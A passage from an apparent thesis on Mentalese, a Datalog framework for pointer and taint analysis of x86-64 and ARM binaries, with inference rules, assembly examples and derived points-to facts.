 2     int **a, **b, *x, *y, x1, y1, w1, k1;
 3     x = &x1;
 4     y = &y1;
 5
 6     a = &x;
 7     b = &y;
 8
 9     //*a=*b;
10     int* t = *b;
11     *a = t;
12 }

Figure 3.8: Points-To Graph and its corresponding C program. Black edges are address taken edges, blue edges are inclusion edges, red edges are propagation edges.

Binary Pointer Analysis

We clarified the idea behind Andersen's algorithm. Our approach in Mentalese follows this style, which is what we referred to as Andersen-style. In the following sections we present a context- and field-sensitive analysis for binary executables that follows a similar pattern. The algorithm we present for the pointer analysis is inspired by the work of Smaragdakis et al. [187, 186]. Before we continue, we define the notation for modeling pointers that we use in the rest of this work.

Definition 7. Let V be the set of local variables, H the set of heap allocation sites, G the set of globals, and L the set of all code locations. Let further P = {p | p = &x, x ∈ V ∪ G} ∪ {p | p = malloc_x, x ∈ H} be the set of pointers. A pointer-descriptor is defined as

P → {LocalVar, Heap, Global} × L,

where LocalVar, Heap, and Global are strings.

Terms      Description

t0         reg: base register
t1         disp: displacement added to base, or −1 if access = "R"
t2         access: t2 ∈ {R, D}
t3         pointer_descr: pointer-descriptor
t4         id: specific ID attached to the pointer
t5 ... t7  bb, order, ctx: IL-address

Figure 3.9: PtsTo specification: PtsTo(reg, disp, access, pointer_descr, id, bb, order, ctx).

Example. For simplicity we look at C code here, rather than the binary. Assume we are confronted with the C code below:

1 int x = 0x1337;
2 int* p1 = &x;
3 int* p2 = (int*) malloc(32);

A pointer-descriptor for p1 is given by (LocalVar, 2), and for p2 we have (Heap, 3).

In Section 3.4.1 we introduced the notion of transition descriptors and implemented a rule set that sets the base for our analyses. Each transition descriptor is embedded in transitional semantics. This is best shown by code:

1 PtsTo(reg2, -1, "R", descr, id, bb, order, ctx) :-
2     chain_rr(reg1, reg2, bb, order, ctx),
3     PtsTo(reg1, -1, "R", descr, id, _, _, ctx).

We basically ask for a register to register assignment, and if the used register is a pointer, then the defined register is a pointer that points to the same location. The recursive rule specifies transitional semantics for a register to register move with respect to points-to sets. More specifically, we have our transition descriptor on line 2, which queries for register to register moves where reg1 is assigned to reg2. On line 3 we specify that reg1 has to be a pointer. Consequently, reg2 holds an address as well and points to the same location as reg1. If lines 2-3 are true, then PtsTo gets instantiated and we have derived a new fact that represents this information flow in terms of points-to information. The meaning of each term in the PtsTo predicate is specified in Figure 3.9. The motivation behind this notation is to encode memory and register information with one predicate. The term access (t2) specifies the access through a register (R) or memory (D, which stands for dereference).

 1  push rbp                            push {r7}
 2  mov rbp,rsp                         sub sp, #36        ; 0x24
 3  lea rax,[rbp-0x2c]                  add r7,sp,#0
 4  mov QWORD PTR [rbp-0x20],rax        add.w r3, r7, #8
 5  lea rax,[rbp-0x30]                  str r3, [r7, #16]
 6  mov QWORD PTR [rbp-0x28],rax        adds r3, r7, #4
 7  lea rax,[rbp-0x20]                  str r3, [r7, #12]
 8  mov QWORD PTR [rbp-0x8],rax         add.w r3, r7, #16
 9  lea rax,[rbp-0x28]                  str r3, [r7, #28]
10  mov QWORD PTR [rbp-0x10],rax        add.w r3, r7, #12
11  mov rax,QWORD PTR [rbp-0x10]        str r3, [r7, #24]
12  mov rax,QWORD PTR [rax]             ldr r3, [r7, #24]
13  mov QWORD PTR [rbp-0x18],rax        ldr r3, [r3, #0]
14  mov rax,QWORD PTR [rbp-0x8]         str r3, [r7, #20]
15  mov rdx,QWORD PTR [rbp-0x18]        ldr r3, [r7, #28]
16  mov QWORD PTR [rax],rdx             ldr r2, [r7, #20]
17  nop                                 str r2, [r3, #0]
18  pop rbp                             nop
19  ret                                 adds r7, #36       ; 0x24
20                                      mov sp, r7
21                                      ldr.w r7, [sp], #4
22                                      bx lr

Figure 3.10: Assembly code for the C code of Figure 3.8: the left column shows x86-64 assembly, the right column its Armv7 counterpart in Thumbv2 mode.

If t2 indicates a register, then the displacement is set to −1. The term pointer_descr (t3) is a pointer-descriptor, a string as defined in Definition 7. It encodes whether a pointer points to a stack location (LocalVar), a heap location, or a global section, and associates the address of the pointer definition with it. For heap pointers, this is equivalent to the allocation site. In some cases the pointer-descriptor is not enough; for heap pointers we might want to model different invocations at the same allocation site. For stack locations it comes in handy to know the stack pointer delta values (see Definition 6) that correspond to the pointed-to location. We want to further clarify the concept with an example, for which we refer to Figure 3.10. The figure shows the assembly code for the C code of Figure 3.8 to which we applied Andersen's algorithm. Let us take the third line on the left-hand side, the x86-64 code, into account. The following assembly instruction loads the address of the stack location rbp-0x2c into the register rax:

lea rax, [rbp-0x2c]

The equivalent code for Armv7 in Thumbv2 mode is on line 4:

add.w r3, r7, #8

For these two instructions, Mentalese takes the following points-to facts into account:

x86-64  PtsTo(rax_0, -1, R, 'LocalVar,0x40110a', -52, 4198662, 3, main)
ARM     PtsTo(r3_0, -1, R, 'LocalVar,0x103a6', -32, 66464, 4, main)

Both facts describe a pointer to a stack location whose address is stored in rax and r3, respectively. The ID attached to these pointers is the stack pointer delta value (see Definition 6). Recall that the delta value is used to model stack locations in a normalized stack. In our x86-64 example we have a delta value of -52 as the ID, which means that the pointer points to the location sp-52, where sp is the initial stack pointer. We recall that the initial stack pointer refers to its location at the beginning of the function call, i.e., before any modification is performed on it (see Section 3.3.1). Lines 4 and 5 in Figure 3.10, which correspond to the x86-64 and ARM code respectively, both store the pointer value onto the stack. Both of these instructions correspond to line 3 in Figure 3.8, i.e., the definition of variable x. For these instructions Mentalese derives the following facts:

x86-64  PtsTo(rsp_0, -32, D, 'LocalVar,0x40110a', -52, 4198662, 4, main)
ARM     PtsTo(r7_0, 16, D, 'LocalVar,0x103a6', -32, 66464, 9, main)

As the IDs indicate, these facts represent the same pointers we saw above. The facts describe a dereference where the dereferenced value is a pointer to a stack location that is described by its stack pointer delta value. In Figure 3.11 we present an intraprocedural field-sensitive pointer analysis. Each rule encapsulates a transition descriptor as defined in Section 3.4.1. The whole algorithm is an inference system that derives PtsTo facts until it saturates. The facts derived in our dereference example above are obtained through the second rule in Figure 3.11. The rule basically follows the same pattern that we covered for the first one: we ask for a register to memory store where the address of the store is symbolically modeled by base + disp, and if our register holds a pointer, then the value dereferenced from base + disp holds the same pointer. The fifth rule, denoted by its header PPtsP, specifies a pointer points-to pointer relation. Note that each term is grounded by variables that we already defined. The fifth rule states that if we 1) have a register to memory store to base + disp, 2) know through a derived PtsTo fact where the base register points to, and 3) know that the register value to be stored is also a pointer, then we have a pointer points-to pointer relation. We interpret a derived fact from this rule in words

// Rule 1
PtsTo(reg2, -1, "R", descr, id, bb, order, ctx) :-
    chain_rr(reg1, reg2, bb, order, ctx),
    PtsTo(reg1, -1, "R", descr, id, _, _, ctx).

// Rule 2
PtsTo(base, disp, "D", descr, id, bb, order, ctx) :-
    chain_rm(reg, base, disp, bb, order, ctx),
    PtsTo(reg, -1, "R", descr, id, _, _, ctx).

// Rule 3
PtsTo(reg, -1, "R", descr, id, bb, order, ctx) :-
    chain_mr(base, disp, reg, bb, order, ctx),
    PtsTo(base, disp, "D", descr, id, _, _, ctx).

// Rule 4
PtsTo(reg, -1, "R", descr2, id2, bb, order, ctx) :-
    chain_mr(base, disp, reg, bb, order, ctx),
    PtsTo(base, -1, "R", descr1, id1, bb, order, ctx),
    PPtsP(type1, id1, disp, descr2, id2, _, _, ctx).

// Rule 5
PPtsP(type1, id1, disp, descr2, id2, bb, order, ctx) :-
    chain_rm(reg, base, disp, bb, order, ctx),
    PtsTo(base, -1, "R", descr1, id1, _, _, ctx),
    PtsTo(reg, -1, "R", descr2, id2, _, _, ctx).

// Rule 6
PtsTo(phi_def, -1, "R", descr, id, bb, order, ctx) :-
    Phi(bb, order, ctx),
    Register(_, phi_def, "d", _, bb, order, ctx),
    Register(_, phi_use, "u", _, bb, order, ctx),
    PtsTo(phi_use, -1, "R", descr, id, _, _, ctx).

Figure 3.11: Pointer Analysis.

that a pointer, identified by its descriptor descr1 and id1, offset by disp, points to a pointer described by descr2 and id2. Moreover, the fifth rule allows us to reconstruct access paths. The last rule handles φ-statements; it says that if any of the right-hand side registers of the φ-statement is a pointer, then the left-hand side is a pointer. The following φ-statement clarifies this:

regx = φ(rega, . . . , regb)

If any register in {rega, . . . , regb} holds a pointer, then regx holds that pointer. The algorithm we present in Figure 3.11 is partially flow-sensitive, which we achieve through SSA. This lies in the nature of the SSA form: each definition dominates its uses, and this relation respects the control flow. However, we achieve this only for registers, where definitions and uses can be clearly determined. Rule three in Figure 3.11 does not consider the control flow for memory loads. The last line of the rule looks for derived PtsTo facts that are associated with memory loads from the same address, ignoring the program point and thus making flow-insensitive choices. We show in the next section how we extend our algorithm to achieve better flow-sensitivity and a context-sensitive interprocedural analysis, but before we continue, we introduce the notion of starter rules. Note that each PtsTo rule is recursive; a starter rule sets the stage for the pointer analysis by specifying an initial set of PtsTo facts. We have already covered this situation in our example. Consider lines 3 and 4 on the left and right side of Figure 3.10, respectively. These instructions use the stack pointer directly in an equation and store the result in a register. A set of rules in Mentalese looks for these instructions and sets up an initial PtsTo set. For heap pointers, Mentalese looks for calls to known allocators or the new operator that return a fresh pointer.
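The saturation behavior of rules 1-3 in Figure 3.11 can be sketched outside of Datalog as well. The following Python toy replays the lea/store/load pattern of Figure 3.10 over an invented fact base; all names, addresses, and IDs are illustrative, not taken from a real binary:

```python
# Facts are 8-tuples (reg_or_base, disp, access, descr, id, bb, order, ctx)
# following Figure 3.9.
chain_rr_facts = [("rax_1", "rdi_0", 0x40, 3, "main")]       # rdi_0 <- rax_1
chain_rm_facts = [("rax_0", "rsp_0", -32, 0x40, 1, "main")]  # [rsp_0-32] <- rax_0
chain_mr_facts = [("rsp_0", -32, "rax_1", 0x40, 2, "main")]  # rax_1 <- [rsp_0-32]

# Starter fact, e.g. derived from `lea rax, [rbp-0x2c]`.
facts = {("rax_0", -1, "R", "LocalVar,0x40110a", -52, 0x40, 0, "main")}

def saturate(pts):
    changed = True
    while changed:
        new = set()
        for (r, d, a, descr, pid, _, _, ctx) in pts:
            if a == "R":
                # Rule 1: a register-to-register move propagates the pointer.
                for (r1, r2, bb, order, c) in chain_rr_facts:
                    if r1 == r and c == ctx:
                        new.add((r2, -1, "R", descr, pid, bb, order, c))
                # Rule 2: storing the pointer marks the slot base+disp.
                for (reg, base, disp, bb, order, c) in chain_rm_facts:
                    if reg == r and c == ctx:
                        new.add((base, disp, "D", descr, pid, bb, order, c))
            else:  # a == "D"
                # Rule 3: loading from base+disp yields the pointer again.
                for (base, disp, reg, bb, order, c) in chain_mr_facts:
                    if base == r and disp == d and c == ctx:
                        new.add((reg, -1, "R", descr, pid, bb, order, c))
        changed = not new <= pts
        pts |= new
    return pts

result = saturate(facts)
print(len(result))  # 4 facts: rax_0, the stack slot, rax_1, and rdi_0
```

One starter fact suffices: the store taints the stack slot, the load resurrects the pointer in a new SSA register, and the move propagates it further, mirroring how the recursive Datalog rules feed each other until saturation.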

3.4.3 Flow-Sensitivity

The previous section covered the foundation of an intraprocedural pointer analysis for binary code. In particular, due to SSA, we have a partially flow-sensitive analysis. This is interesting since our algorithm is flow-insensitive by construction; SSA makes it flow-sensitive with respect to registers. However, with memory loads and stores taken into account, our analysis falls back into its flow-insensitive nature. We present a minor demand-driven optimization that improves the flow-sensitivity of our algorithm. The use of our StackInfoOffset facts gives us all alias pairs with respect to stack accesses. Recall that we modeled the stack such that the stack pointer delta value is a unique identifier for any stack location within the function, and we can query for this value by searching the StackInfoOffset facts (see Section 3.3.1). We tackle the problem of the third rule in Figure 3.11 and change it to ignore stack bases. For any pointer information that flows into a stack location, we start a reaching definition analysis with respect to its stack pointer delta value. As a result, we get flow-sensitivity with respect to stack dereferences. We add another rule to our algorithm to handle stack-based dereferences, which checks at the program point of the memory load whether we have a reaching definition with the same stack pointer delta value. This, in particular, means that we have a flow-sensitive information flow from a program point that stored a pointer onto the stack. Flow-sensitive pointer analysis is traditionally hard. In general, the intraprocedural case with multiple levels of pointers is NP-hard [120]. Horwitz showed that even a precise flow-insensitive intraprocedural analysis with multiple levels of dereferences is NP-hard [102].
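A minimal Python sketch of the reaching-definition refinement described above; the program points, delta values, and fact names are invented for illustration:

```python
# Stores of pointers into normalized stack slots within one basic block,
# as (order, delta, fact), listed in control-flow order.
stack_stores = [
    (4, -32, "ptr_to_x"),
    (7, -32, "ptr_to_y"),   # overwrites the slot at sp-32
    (9, -48, "ptr_to_z"),
]

def reaching_store(load_order, delta):
    """Closest preceding store to the same delta: the flow-sensitive choice."""
    candidates = [s for s in stack_stores if s[1] == delta and s[0] < load_order]
    return max(candidates, default=None)

print(reaching_store(8, -32))  # the store at order 7 wins over the one at 4
```

A flow-insensitive rule would merge both stores to sp-32; filtering by the closest dominating store with the same delta keeps only the definition that actually reaches the load.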

3.4.4 Context-Sensitivity

A context-sensitive analysis can distinguish between different method invocations. It respects the notion of realizable paths, which means that the flow of information that runs through a callee flows back to the correct callsite of the callee. In contrast, a context-insensitive analysis merges the information of interest at every callsite, ignoring the calling context. It has been controversially discussed over the past decades of research where context-sensitivity brings a benefit and when the precision is worth the effort. Context can also be interpreted from a different point of view, which has given rise to other analysis flavors, such as object-sensitivity. We follow the classic technique known as the callstring approach. Here, a pointer passed to a callee is associated with a unique calling string. For this purpose we use the pointer-descriptor term (t3) in our PtsTo literal. On the assembly level, we have different calling conventions according to different ABIs. Go programs, for instance, come with their own ABI, and Rust programs do not follow a stable ABI at all. Other operating systems might enforce their own calling convention2. The question that arises here is how to handle these programs on the binary level. What we need is a generic approach that tries to infer what the parameters are. We approach the problem with queries for registers that are not SSA subscripted. These registers can be callee-saved registers, but they are also candidates for parameters. For variables passed through the stack we look for a positive stack pointer delta value. For the first case, we utilize the Scope facts (see Section 3.3.3). Recall that these facts give us all live SSA registers at the callsite. Here we check if a parameter candidate, a register without subscription, matches one of our scoped registers. For instance, on x86-64 the common calling convention under Linux is fastcall, which follows the AMD64 ABI. Here, the register for the first parameter is rdi. Let us recall the example from Figure 3.5 which shows Scope facts at the callsites of libssh2_list_add. For each callsite we check for non-subscripted registers in the callee and match them through Scope facts with the definition of the register at the callsite. We call such a register a passthrough. In our example of Figure 3.5, rdi_82 and rsi_61 are passthroughs for the x86-64 case, which are respectively matched to their non-subscripted counterparts rdi and rsi in the callee context; for ARM, r_0_105 and r_1_63 are passthroughs. The following rule delivers the idea:

2 Windows vs. Linux fastcall on x86-64

PassThrough(reg_ssa, bb, order, ctx_caller,
            reg, bb_callee, order_callee, ctx_callee) :-
    Scope(reg, reg_ssa, "Call", bb, order, ctx_caller),
    CallTo(_, ctx_callee, _, ".text", bb, order, ctx_caller),
    Register(_, reg, "u", _, bb_callee, order_callee, ctx_callee),
    !StackBased(reg),
    !Phi(bb_callee, order_callee, ctx_callee).

The first term of the literal is the SSA subscripted live definition of the register at the callsite, and the fifth term the non-subscripted use of the register in the callee at the IL-address (bb, order, ctx). In the rule we ignore the cases for the stack pointer, and we ignore φ-statements, which are handled in a separate rule. This is motivated by the fact that in some binaries we encounter sequences of φ-chains, which we define as a def-use relation between two φ-statements.

Definition 8. Let S1: r_im = φ(r_ia, ..., r_ik) and S2: r_in = φ(r_ja, ..., r_im, ..., r_jk) be two φ-statements where i, j ∈ ℕ. The right-hand side of a statement is called a φ-expression. A φ-chain links r_im in S1 with its use in the φ-expression of S2.

With the φ-chains handled, we get a proper PassThrough relation. What is left is the transitive closure of PassThrough relations, which covers the cases where a parameter is literally passed through a chain of calls until it is used. Pointer information that runs into a passthrough induces a new context by appending the callsite address to the pointer-descriptor (see Definition 7). Let us assume that we have derived the following Scope and PtsTo facts:

1 Scope(rdi, rdi_13, "Call", 4199094, 23, A).
2 PtsTo(rdi_13, -1, "R", "LocalVar,0x401290", 4199094, 20, A).
3 PtsTo(rdi, -1, "R", "LocalVar,0x401290,0x4012be", 4198720, 10, B).

The register rdi_13 is a passthrough register, and we have a PtsTo fact associated with it at line 2. What we derive for the callee B is a new PtsTo fact at line 3 with the callsite appended to the pointer-descriptor. The following rule shows how we derive these facts:

1 PtsTo(reg_callee, -1, "R", descr, id, bb, order, ctx_callee) :-
2     PassThrough(reg_caller, _, _, ctx_caller,
3                 reg_callee, bb, order, ctx_callee),
4     Scope(_, reg_caller, "Call", bb_caller, order_caller, ctx_caller),
5     ILAddrToAddr(bb_caller, order_caller, cs_addr),
6     PtsTo(base_reg, -1, "R", descr, id, _, _, ctx_caller),
7     kSensitivity(k),
8     descr = Push(descr, cs_addr, k).

The last line introduces a new concept into the language: functors. Functors are custom functions, written in any language, that ease the logic and can be called on instantiated terms. Functors are usually not part of Datalog, but some dialects like Soufflé allow them. In Soufflé we can call them within a predicate, and the return value of the functor instantiates the corresponding term in that predicate. With functors, Datalog becomes Turing-complete and the termination of a program is no longer guaranteed, as discussed in Section 3.1.1. Therefore, caution is required when using functors. We summarize our functors as follows:

• Push: ((Pool, loc), callsite, k) ↦ (Pool, loc, callsite), with Pool ∈ {LocalVar, Heap, Global}

• Pop: (Pool, loc, callsite_1, ..., callsite_k) ↦ (Pool, loc, callsite_1, ..., callsite_{k−1}), and (Pool, loc) ↦ id_(Pool,loc) if the tuple has length 2

• AddrOf: (Pool, loc, callsite_1, ..., callsite_k) ↦ callsite_k

The Push functor takes three arguments: the pointer-descriptor, the callsite address, and an integer. It concatenates the callsite address to the descriptor. The third parameter k is an integer that specifies the depth of the call chain. The functor appends a context to the descriptor in a cycle-free manner. This allows us to employ a variation of a technique known as k-limiting or k-sensitivity, which describes context-sensitivity under the scope of the last k callsites. In Figure 3.12 we present the extensions for context-sensitivity. The first rule describes the Push mechanism we presented above. The second rule updates the PPtsP facts in the context of the caller. The term descr1 gets instantiated with a pointer-descriptor, given that there is any derived fact, and the callsite gets extracted by AddrOf. We use the ILAddrToAddr facts to map the callsite address to an IL-address. Now we basically misuse Register facts to get from the basic block to the caller context. Note that with the Pop of the corresponding pointer-descriptor in the header, one callsite is removed, and we get a descriptor for the caller. This way, each PPtsP fact induced by effects of the callee is mapped back to the right callsite in the context of the caller. The third rule follows the other direction; it passes information from caller to callee. For this rule, we first look at memory to register moves, check if the base of the memory load points to something we have derived, and basically use the Pop trick from the point of view of the callee.
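To make the functor semantics concrete, here is a Python sketch of Push, Pop, and AddrOf over the string-encoded descriptors used in the PtsTo facts. The cycle check and the identity behavior of Pop on a bare (Pool, loc) descriptor are our reading of the definitions above, not Mentalese code:

```python
# Descriptors are comma-separated strings like "LocalVar,0x401290,0x4012be":
# pool, location, then up to k callsites.

def push(descr: str, callsite: str, k: int) -> str:
    parts = descr.split(",")
    if callsite in parts[2:]:        # keep the call string cycle-free
        return descr
    pool, loc, sites = parts[0], parts[1], parts[2:] + [callsite]
    return ",".join([pool, loc] + sites[-k:])   # k-limiting: last k callsites

def pop(descr: str) -> str:
    parts = descr.split(",")
    # A length-2 descriptor has no callsite to remove; modeled as identity.
    return descr if len(parts) == 2 else ",".join(parts[:-1])

def addr_of(descr: str) -> str:
    return descr.split(",")[-1]      # the most recent callsite

print(push("LocalVar,0x401290", "0x4012be", 2))  # appends the callsite
```

With k = 2, pushing a third callsite drops the oldest one, which is exactly the k-limiting behavior described above.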

// Rule 1
PtsTo(reg_callee, -1, "R", descr, id, bb, order, ctx_callee) :-
    PassThrough(reg_caller, _, _, ctx_caller,
                reg_callee, bb, order, ctx_callee),
    Scope(_, reg_caller, "Call", bb_caller, order_caller, ctx_caller),
    ILAddrToAddr(bb_caller, order_caller, cs_addr),
    PtsTo(base_reg, -1, "R", descr, id, _, _, ctx_caller),
    kSensitivity(k),
    descr = Push(descr, cs_addr, k).

// Rule 2
PPtsP(Pop(descr1), id1, disp, descr2, id2, bb, order, caller) :-
    PPtsP(descr1, id1, disp, descr2, id2, _, _, _),
    ILAddrToAddr(bb, order, AddrOf(descr1)),
    Register(_, _, _, _, bb, _, caller).

// Rule 3: collects from callers
PtsTo(V1, -1, "R", descr2, id2, bb, order, ctx) :-
    chain_mr(base, disp, V1, bb, order, ctx),
    PtsTo(base, -1, "R", descr1, id1, _, _, ctx),
    ILAddrToAddr(bb, _, AddrOf(descr1)),
    Register(_, _, _, _, bb, _, caller_ctx),
    PPtsP(Pop(descr1), id1, disp, descr2, id2, _, _, caller_ctx).

// Rule 4
PtsTo(reg, -1, "R", Pop(descr), id, bb, order, ctx_caller) :-
    returns_pointer(_, descr, id, ctx_callee),
    CallTo(_, ctx_callee, _, _, bb, _, ctx_caller),
    Register(_, f_ret_reg, "u", _, bb, order, ctx_caller),
    match("f_ret_.*", f_ret_reg),
    Register(_, reg, "d", _, _, _, bb, order, ctx_caller).

// Rule 5
GlobalPtr(reg, cst_val, bb, order, ctx) :-
    Memory(_, "load", "Cst", cst_id, _, bb, order, ctx),
    Constant(cst_id, cst_val, bb, order, ctx),
    Register(_, reg, "d", _, bb, order, ctx).

// Rule 6
PtsTo(reg, -1, "R", "Global", approx_addr, bb, order, ctx) :-
    GlobalPtr(reg, approx_addr, bb, order, ctx).

Figure 3.12: Extensions for Context-sensitivity.

The third rule of Figure 3.12 increases precision in situations like the following:

mov rax, [rbp-0x10]
mov rax, [rax + 8]

This sequence of x86-64 instructions is part of a routine which processes a linked list. It accesses the next pointer and moves that value into rax. When we see such a memory to register load, usually the third rule in Figure 3.11 takes effect. However, in some cases the callee does not know that the dereferenced value is a pointer as well. This is resolved by our third rule in Figure 3.12. The fourth rule for context-sensitivity handles return values that are pointers. It maps them back to f_ret registers in the caller (see Section 3.3.2). Here we use a builtin functor, match, that checks whether the used register is an f_ret_* register. At the callsite we then have a PtsTo fact that points to the same locations as the return value. The fifth rule is not necessarily an extension for context-sensitivity, but we added it here for convenience. This rule looks for memory loads where the base is a constant, acquires that value through Constant facts, and looks for a register that is defined at that address. This register is treated as a global pointer, and we derive such a pattern as a GlobalPtr fact. The last rule copies the GlobalPtr facts into instances of PtsTo facts. The motivation for this separation is that we might not want globals to be part of the analysis; we can still query for them, but they can simply be guarded here as a choice. This section has shown how flexibly we can add precision and sensitivity to our analysis. Usually, for context-sensitive approaches an interprocedural control flow graph (ICFG) is constructed and the corresponding logic of the algorithms is applied to it. Our approach builds this ICFG on the fly and on demand.

3.5 Analysis Derivatives

In the previous section we presented the backend of Mentalese and the techniques we built and implemented for a field- and context-sensitive binary analysis with partial flow-sensitivity, which we improved for more precision. Although we have explicitly applied these techniques to pointer analysis, the patterns also apply to the other analyses we present in this section. Basically, each information flow analysis we present is a derivative of what we have seen so far.

3.5.1 Taint-Analysis

Taint analysis is a widely used term for a source-to-sink information flow analysis. In Chapter 4 we use it as a building block to find and trigger exploitation primitives for web browsers. Defining sinks and customizing taint propagation policies is a cumbersome task in many frameworks we tested. We seek analysis procedures that interplay transparently, i.e., information exchange is naturally adapted by the analyses. In this section we present an accessible route to taint analysis and show how it enters into symbiosis with other analysis procedures that can be implemented in Mentalese. In fact, we can interpret pointer analysis as an information flow analysis with specific taint policies. Propagation of information is modeled through transfer descriptors which we defined in Section 3.4.1. For instance, we use the following taint propagation rule for a register-to-register move event:

Taint(reg2, -1, "R", descr, color, bb, order, ctx) :-
    chain_rr(reg1, reg2, bb, order, ctx),
    Taint(reg1, -1, "R", descr, color, _, _, ctx).

Terms       Description
t0          reg: base register
t1          disp: displacement added to base, or −1 if access = "R"
t2          access: t2 ∈ {R, D}
t3          taint_descr: descriptor
t4          color: specific ID/taint tag attached to the pointer
t5 . . . t7 bb, order, ctx: IL-address

Figure 3.13: Taint specification: Taint(reg, disp, access, taint_descr, color, bb, order, ctx).

This is the same recursive rule we used in the pointer analysis. All we need is to change the name of the predicates to Taint and extend the set of rules to cope with the needs of a taint analysis. For clarity, we define a predicate Taint as presented in Figure 3.13. This definition is isomorphic to the Pts definition. The descriptor serves the same task as in the pointer analysis, i.e., keeping track of the context. The only difference is the tuple, which is defined as P → Taint × L. In the common literature on taint analysis we often see the term color, which is used to indicate taint that comes from different sources. We use the term in our predicate with the same purpose, but we treat the color as a number. We do not perform any operations on these color values, that is, mixing them or adding them up. Instead we look at the facts at the locations or sinks of interest to see if we have any taint information with different color IDs. The propagation for each ID is performed until the system saturates. We do not give a complete set of rules, as the patterns for the taint analysis are almost the same as those for the pointer analysis. In Figure 3.14 we present the extensions that are new to the taint analysis. For a compact presentation we use syntactic sugar for disjunction, which is supported by the Soufflé engine.
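The saturation behavior of such a recursive rule can be mimicked with a tiny fixpoint loop. The Python sketch below uses simplified fact shapes (register names only) and illustrative names; it is not the Soufflé evaluation itself, only the idea of applying the rule until no new facts appear:

```python
# Minimal sketch of how a recursive rule like
#   Taint(r2, ...) :- chain_rr(r1, r2, ...), Taint(r1, ...)
# saturates: reapply the rule until the set of facts stops growing.

def saturate(chain_rr, seeds):
    taint = set(seeds)
    changed = True
    while changed:                      # fixpoint iteration
        changed = False
        for (r1, r2) in chain_rr:
            if r1 in taint and r2 not in taint:
                taint.add(r2)           # derived fact
                changed = True
    return taint

edb = {("rax", "rdi"), ("rdi", "rsi"), ("rbx", "rcx")}
print(sorted(saturate(edb, {"rax"})))  # ['rax', 'rdi', 'rsi']
```

The Datalog engine performs this saturation semi-naively and for all rules simultaneously; the loop above only illustrates the termination argument (the fact set grows monotonically within a finite universe).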

The (P1; P2) language construct in the figure stands for a disjunction of P1 and P2. We can express the same thing with two rules: one rule with an explicit P1 in its body, and the other rule with an explicit P2.

Rule Interplay

We want to go into more detail about the set of rules in Figure 3.14. The first rule follows the same functionality as the third rule in Figure 3.11: it looks for memory-to-register events by utilizing the corresponding transition descriptor, ignores stack bases [3], and finally checks whether the dereferenced value is tainted or the base itself is. The reader might ask why we make a disjoint query and check the taint status of the base register. This choice is motivated by the fact that if we control the base, then we might be able to redirect the memory load to a controlled section, i.e., we control the loaded value. Rule 2 in Figure 3.14 looks for equation-to-register patterns and checks if any of the operands are tainted. Rules 3 and 4 follow the same pattern for the other equation events. Rule 5 is a so-called glue-rule: seeing the nature of our rule set, it seems natural to merge the taint analysis and pointer analysis into one analysis procedure. This idea is also followed by Grech and Smaragdakis [90]. To ensure flexibility, Mentalese is implemented with a base set of propagation rules, and each analysis extends this set of rules for its own purpose. Merging analysis facts is performed with glue-rules, which combine the predicates of interest into one rule, basically gluing them together. The functor contains is built in and checks for two PtsTo facts whether one pointer-descriptor is a prefix of the other or, more precisely, part of the context of the other. This allows us to walk bidirectionally, from caller to callee and vice versa. Without the fifth rule, the taint analysis comes with a disadvantage; think of a scenario where we have a linked list and one of its attributes is an integer that is user controlled. The pointer to the element is passed to a function where another list element is created and its integer field depends on the integer field of the passed element. The following C code simulates the scenario as illustrated in Figure 3.16.
The id parameter of function process is user controlled and is used to initialize the id attribute of the list element el. The function f1 gets the list element and

[3] Please refer to Section 3.4.3 on why stack bases are handled differently to achieve more precision with respect to flow-sensitivity.

// Rule 1
Taint(reg, -1, "R", descr, col, bb, order, ctx) :-
    chain_mr(base, disp, reg, bb, order, ctx),
    !StackBased(base),
    ( Taint(base, -1, "R", descr, col, _, _, ctx);
      Taint(base, disp, "D", descr, col, _, _, ctx) ).

// Rule 2
Taint(reg_def, -1, "R", descr, col, bb, order, ctx) :-
    chain_eqrr(reg_def, reg1, _, reg2, bb, order, ctx),
    ( Taint(reg1, -1, "R", descr, col, _, _, ctx);
      Taint(reg2, -1, "R", descr, col, _, _, ctx) ).

// Rule 3
Taint(reg_def, -1, "R", descr, col, bb, order, ctx) :-
    chain_eqmr(reg_def, base, disp, _, reg2, bb, order, ctx),
    ( Taint(base, disp, "D", descr, col, _, _, ctx);
      Taint(base, -1, "R", descr, col, _, _, ctx);
      Taint(reg2, -1, "R", descr, col, _, _, ctx) ).

// Rule 4
Taint(reg_def, -1, "R", descr, col, bb, order, ctx) :-
    chain_eqrm(reg_def, reg, _, base, disp, bb, order, ctx),
    ( Taint(base, disp, "D", descr, col, _, _, ctx);
      Taint(base, -1, "R", descr, col, _, _, ctx);
      Taint(reg, -1, "R", descr, col, _, _, ctx) ).

// Rule 5
Taint(reg2, disp, "D", descr_t, col, bbl, orderl, ctx2) :-
    Taint(reg, disp, "D", descr_t, col, bb, order, ctx),
    PtsTo(reg, -1, "R", descr, _, bb, order, ctx),
    ctx != ctx2,
    PtsTo(reg2, -1, "R", descr2, _, addr2, ctx2),
    contains(descr, descr2),
    chain_mr(reg2, disp, _, bbl, orderl, ctx2).

Figure 3.14: Rule Set: Extensions for Taint Analysis.

creates a new list element which is linked to el. Its id attribute depends on the controlled id attribute of the first element. In a dynamic approach, taint analysis is usually achieved through shadow memory techniques [188]. During the execution, we can always check the states, which makes taint analysis more accessible through dynamic techniques. Statically, we need to make assumptions about all possible paths and make sure the analysis scales and

rsp_0   -24 D HeapPtr,0x401182,0x40119c 0 0x40113e f1
rsp_0   -16 D HeapPtr,0x401147          0 0x4011c4 main
rsp_0    -8 D HeapPtr,0x401147          0 0x40114c f1
rsp_0    -8 D HeapPtr,0x401182          0 0x401187 main
rax_0    -1 R HeapPtr,0x401147          0 0x401147 f1
rax_0    -1 R HeapPtr,0x401182          0 0x401182 main
rax_1    -1 R HeapPtr,0x401182          0 0x40118b main
rax_1    -1 R HeapPtr,0x401182,0x40119c 0 0x401150 f1
rdi      -1 R HeapPtr,0x401182,0x40119c 0 0x40113e f1
rdx_1    -1 R HeapPtr,0x401147          0 0x401163 f1
rdi_1    -1 R HeapPtr,0x401182          0 0x401199 main
rax_2    -1 R HeapPtr,0x401182          0 0x401195 main
rax_3    -1 R HeapPtr,0x401147          0 0x401159 f1
rax_3    -1 R HeapPtr,0x401182          0 0x40119c main
rax_4    -1 R HeapPtr,0x401182          0 0x4011a1 main
rax_4    -1 R HeapPtr,0x401182,0x40119c 0 0x40115f f1
rax_4     8 D HeapPtr,0x401147          0 0x401167 f1
rax_5    -1 R HeapPtr,0x401147          0 0x4011a5 main
rax_9    -1 R HeapPtr,0x401182          0 0x4011bc main
